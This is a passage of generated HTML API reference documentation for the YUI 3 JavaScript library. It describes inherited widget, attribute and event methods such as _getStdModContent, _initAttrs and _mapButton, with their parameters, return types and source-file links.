<p>Creates a cloned shim node, using the SHIM_TEMPLATE html template, for use on a new instance.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
node A new shim Node instance.
</div>
</div>
</div>
<div id="method__getSrcNode" class="method item protected inherited">
<h3 class="name"><code>_getSrcNode</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__getSrcNode">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l74"><code>widget/js/WidgetHTMLParser.js:74</code></a>
</p>
</div>
<div class="description">
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The Node to apply HTML_PARSER to
</div>
</div>
</div>
<div id="method__getStateVal" class="method item private inherited">
<h3 class="name"><code>_getStateVal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Any</span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__getStateVal">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l522"><code>attribute/js/AttributeCore.js:522</code></a>
</p>
</div>
<div class="description">
<p>Gets the stored value for the attribute, from either the
internal state object, or the state proxy if it exits</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Any</span>:
The stored value of the attribute
</div>
</div>
</div>
<div id="method__getStdModContent" class="method item private inherited">
<h3 class="name"><code>_getStdModContent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__getStdModContent">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l656"><code>widget-stdmod/js/Widget-StdMod.js:656</code></a>
</p>
</div>
<div class="description">
<p>Retrieves the child nodes (content) of a standard module section</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The standard module section whose child nodes are to be retrieved. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The child node collection of the standard module section.
</div>
</div>
</div>
<div id="method__getStdModTemplate" class="method item protected inherited">
<h3 class="name"><code>_getStdModTemplate</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__getStdModTemplate">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l532"><code>widget-stdmod/js/Widget-StdMod.js:532</code></a>
</p>
</div>
<div class="description">
<p>Gets a new Node reference for the given standard module section, by cloning
the stored template node.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section to create a new node for. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The new Node instance for the section
</div>
</div>
</div>
<div id="method__getStrings" class="method item protected inherited">
<h3 class="name"><code>_getStrings</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>locale</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__getStrings">Widget</a>:
<a href="../files/widget_js_WidgetLocale.js.html#l53"><code>widget/js/WidgetLocale.js:53</code></a>
</p>
</div>
<div class="description">
<p>Returns the strings key/value hash for a paricular locale, without locale lookup applied.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">locale</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
</div>
<div id="method__getType" class="method item private inherited">
<h3 class="name"><code>_getType</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method__getType">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l36"><code>event-custom/js/event-target.js:36</code></a>
</p>
</div>
<div class="description">
<p>If the instance has a prefix attribute and the
event type is not prefixed, the instance prefix is
applied to the supplied type.</p>
</div>
</div>
<div id="method__getUIEventNode" class="method item protected inherited">
<h3 class="name"><code>_getUIEventNode</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__getUIEventNode">
Widget
</a>
but overwritten in
<a href="../files/widget-child_js_Widget-Child.js.html#l167"><code>widget-child/js/Widget-Child.js:167</code></a>
</p>
</div>
<div class="description">
<p>Returns the node on which to bind delegate listeners.</p>
<p>Override of Widget's implementation of _getUIEventNode() to ensure that
all event listeners are bound to the Widget's topmost DOM element.
This ensures that the firing of each type of Widget UI event (click,
mousedown, etc.) is facilitated by a single, top-level, delegated DOM
event listener.</p>
</div>
</div>
<div id="method__getX" class="method item protected inherited">
<h3 class="name"><code>_getX</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__getX">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l220"><code>widget-position/js/Widget-Position.js:220</code></a>
</p>
</div>
<div class="description">
<p>Default getter for the X attribute. The value is retrieved from
the XY attribute, which is the sole store for the XY state.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
The X page co-ordinate value
</div>
</div>
</div>
<div id="method__getY" class="method item protected inherited">
<h3 class="name"><code>_getY</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPosition.html#method__getY">WidgetPosition</a>:
<a href="../files/widget-position_js_Widget-Position.js.html#l232"><code>widget-position/js/Widget-Position.js:232</code></a>
</p>
</div>
<div class="description">
<p>Default getter for the Y attribute. The value is retrieved from
the XY attribute, which is the sole store for the XY state.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
The Y page co-ordinate value
</div>
</div>
</div>
<div id="method__guid" class="method item protected inherited">
<h3 class="name"><code>_guid</code></h3>
<span class="paren">()</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__guid">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1151"><code>widget/js/Widget.js:1151</code></a>
</p>
</div>
<div class="description">
</div>
</div>
<div id="method__initAttrHost" class="method item private inherited">
<h3 class="name"><code>_initAttrHost</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
<li class="arg">
<code>values</code>
</li>
<li class="arg">
<code>lazy</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__initAttrHost">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l109"><code>attribute/js/AttributeCore.js:109</code></a>
</p>
</div>
<div class="description">
<p>Constructor logic for attributes. Initializes the host state, and sets up the inital attributes passed to the
constructor.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The attributes to add during construction (passed through to <a href="#method_addAttrs">addAttrs</a>). These can also be defined on the constructor being augmented with Attribute by defining the ATTRS property on the constructor.</p>
</div>
</li>
<li class="param">
<code class="param-name">values</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The initial attribute values to apply (passed through to <a href="#method_addAttrs">addAttrs</a>). These are not merged/cloned. The caller is responsible for isolating user provided values if required.</p>
</div>
</li>
<li class="param">
<code class="param-name">lazy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether or not to add attributes lazily (passed through to <a href="#method_addAttrs">addAttrs</a>).</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__initAttribute" class="method item private inherited">
<h3 class="name"><code>_initAttribute</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__initAttribute">
BaseCore
</a>
but overwritten in
<a href="../files/base_js_Base.js.html#l169"><code>base/js/Base.js:169</code></a>
</p>
</div>
<div class="description">
<p>Initializes Attribute</p>
</div>
</div>
<div id="method__initAttrs" class="method item protected inherited">
<h3 class="name"><code>_initAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
<li class="arg">
<code>values</code>
</li>
<li class="arg">
<code>lazy</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__initAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l863"><code>attribute/js/AttributeCore.js:863</code></a>
</p>
</div>
<div class="description">
<p>Utility method to set up initial attributes defined during construction, either through the constructor.ATTRS property, or explicitly passed in.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The attributes to add during construction (passed through to <a href="#method_addAttrs">addAttrs</a>). These can also be defined on the constructor being augmented with Attribute by defining the ATTRS property on the constructor.</p>
</div>
</li>
<li class="param">
<code class="param-name">values</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The initial attribute values to apply (passed through to <a href="#method_addAttrs">addAttrs</a>). These are not merged/cloned. The caller is responsible for isolating user provided values if required.</p>
</div>
</li>
<li class="param">
<code class="param-name">lazy</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether or not to add attributes lazily (passed through to <a href="#method_addAttrs">addAttrs</a>).</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__initBase" class="method item private inherited">
<h3 class="name"><code>_initBase</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__initBase">
BaseCore
</a>
but overwritten in
<a href="../files/base_js_Base.js.html#l154"><code>base/js/Base.js:154</code></a>
</p>
</div>
<div class="description">
<p>Internal construction logic for Base.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The constructor configuration object</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__initHierarchy" class="method item private inherited">
<h3 class="name"><code>_initHierarchy</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>userVals</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__initHierarchy">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l505"><code>base/js/BaseCore.js:505</code></a>
</p>
</div>
<div class="description">
<p>Initializes the class hierarchy for the instance, which includes
initializing attributes for each class defined in the class's
static <a href="#property_BaseCore.ATTRS">ATTRS</a> property and
invoking the initializer method on the prototype of each class in the hierarchy.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">userVals</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Object with configuration property name/value pairs</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__initHierarchyData" class="method item private inherited">
<h3 class="name"><code>_initHierarchyData</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__initHierarchyData">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l373"><code>base/js/BaseCore.js:373</code></a>
</p>
</div>
<div class="description">
<p>A helper method used by _getClasses and _getAttrCfgs, which determines both
the array of classes and aggregate set of attribute configurations
across the class hierarchy for the instance.</p>
</div>
</div>
<div id="method__initUIEvent" class="method item private inherited">
<h3 class="name"><code>_initUIEvent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__initUIEvent">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l176"><code>widget/js/WidgetUIEvents.js:176</code></a>
</p>
</div>
<div class="description">
<p>Sets up infrastructure required to fire a UI event.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>String representing the name of the event</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
</div>
</div>
</div>
<div id="method__insertStdModSection" class="method item private inherited">
<h3 class="name"><code>_insertStdModSection</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>contentBox</code>
</li>
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>sectionNode</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__insertStdModSection">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l504"><code>widget-stdmod/js/Widget-StdMod.js:504</code></a>
</p>
</div>
<div class="description">
<p>Helper method to insert the Node for the given section into the correct location in the contentBox.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">contentBox</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>A reference to the Widgets content box.</p>
</div>
</li>
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section to create/render. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
<li class="param">
<code class="param-name">sectionNode</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The Node for the section.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__isLazyAttr" class="method item private inherited">
<h3 class="name"><code>_isLazyAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__isLazyAttr">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l299"><code>attribute/js/AttributeCore.js:299</code></a>
</p>
</div>
<div class="description">
<p>Checks whether or not the attribute is one which has been
added lazily and still requires initialization.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
true if it's a lazily added attribute, false otherwise.
</div>
</div>
</div>
<div id="method__isUIEvent" class="method item private inherited">
<h3 class="name"><code>_isUIEvent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>type</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__isUIEvent">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l143"><code>widget/js/WidgetUIEvents.js:143</code></a>
</p>
</div>
<div class="description">
<p>Determines if the specified event is a UI event.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">type</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>String representing the name of the event</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
Event Returns the name of the UI Event, otherwise
undefined.
</div>
</div>
</div>
<div id="method__mapButton" class="method item protected inherited">
<h3 class="name"><code>_mapButton</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__mapButton">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l700"><code>widget-buttons/js/widget-buttons.js:700</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Adds the specified <code>button</code> to the buttons map (both name -> button and
section:name -> button), and sets the button as the default if it is
configured as the default button.</p>
<p><strong>Note:</strong> If two or more buttons are configured with the same <code>name</code> and/or
configured to be the default button, the last one wins.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The button node to map.</p>
</div>
</li>
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer).</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__mapButtons" class="method item protected inherited">
<h3 class="name"><code>_mapButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>buttons</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__mapButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l730"><code>widget-buttons/js/widget-buttons.js:730</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Adds the specified <code>buttons</code> to the buttons map (both name -> button and
section:name -> button), and set the a button as the default if one is
configured as the default button.</p>
<p><strong>Note:</strong> This will clear all previous button mappings and null-out any
previous default button! If two or more buttons are configured with the same
<code>name</code> and/or configured to be the default button, the last one wins.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">buttons</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node[]</a></span>
<div class="param-description">
<p>The button nodes to map.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__mapInstance" class="method item protected inherited">
<h3 class="name"><code>_mapInstance</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>The</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__mapInstance">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l414"><code>widget/js/Widget.js:414</code></a>
</p>
</div>
<div class="description">
<p>Utility method used to add an entry to the boundingBox id to instance map. </p>
<p>This method can be used to populate the instance with lazily created boundingBox Node references.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">The</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>boundingBox id</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__mergeButtonConfig" class="method item protected inherited">
<h3 class="name"><code>_mergeButtonConfig</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>config</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__mergeButtonConfig">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l757"><code>widget-buttons/js/widget-buttons.js:757</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns a copy of the specified <code>config</code> object merged with any defaults
provided by a <code>srcNode</code> and/or a predefined configuration for a button
with the same <code>name</code> on the <code>BUTTONS</code> property.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">config</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Button configuration object, or string name.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A copy of the button configuration object merged with any
defaults.
</div>
</div>
</div>
<div id="method__monitor" class="method item private inherited">
<h3 class="name"><code>_monitor</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>what</code>
</li>
<li class="arg">
<code>eventType</code>
</li>
<li class="arg">
<code>o</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/EventTarget.html#method__monitor">EventTarget</a>:
<a href="../files/event-custom_js_event-target.js.html#l604"><code>event-custom/js/event-target.js:604</code></a>
</p>
</div>
<div class="description">
<p>This is the entry point for the event monitoring system.
You can monitor 'attach', 'detach', 'fire', and 'publish'.
When configured, these events generate an event. click ->
click<em>attach, click</em>detach, click_publish -- these can
be subscribed to like other events to monitor the event
system. Inividual published events can have monitoring
turned on or off (publish can't be turned off before it
it published) by setting the events 'monitor' config.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">what</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>'attach', 'detach', 'fire', or 'publish'</p>
</div>
</li>
<li class="param">
<code class="param-name">eventType</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a> | <a href="../classes/CustomEvent.html" class="crosslink">CustomEvent</a></span>
<div class="param-description">
<p>The prefixed name of the event being monitored, or the CustomEvent object.</p>
</div>
</li>
<li class="param">
<code class="param-name">o</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Information about the event interaction, such as
fire() args, subscription category, publish config</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__normAttrVals" class="method item private inherited">
<h3 class="name"><code>_normAttrVals</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>valueHash</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Attribute.html#method__normAttrVals">
Attribute
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l809"><code>attribute/js/AttributeCore.js:809</code></a>
</p>
</div>
<div class="description">
<p>Utility method to normalize attribute values. The base implementation
simply merges the hash to protect the original.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">valueHash</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>An object with attribute name/value pairs</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
</div>
</div>
</div>
<div id="method__onDocFocus" class="method item protected inherited">
<h3 class="name"><code>_onDocFocus</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>evt</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__onDocFocus">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1079"><code>widget/js/Widget.js:1079</code></a>
</p>
</div>
<div class="description">
<p>DOM focus event handler, used to sync the state of the Widget with the DOM</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">evt</code>
<span class="type"><a href="../classes/EventFacade.html" class="crosslink">EventFacade</a></span>
<div class="param-description">
<p>The event facade for the DOM focus event</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__onDocMouseDown" class="method item protected inherited">
<h3 class="name"><code>_onDocMouseDown</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>evt</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__onDocMouseDown">Widget</a>:
<a href="../files/widget_js_Widget.js.html#l1066"><code>widget/js/Widget.js:1066</code></a>
</p>
</div>
<div class="description">
<p>"mousedown" event handler for the owner document of the
widget's bounding box.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">evt</code>
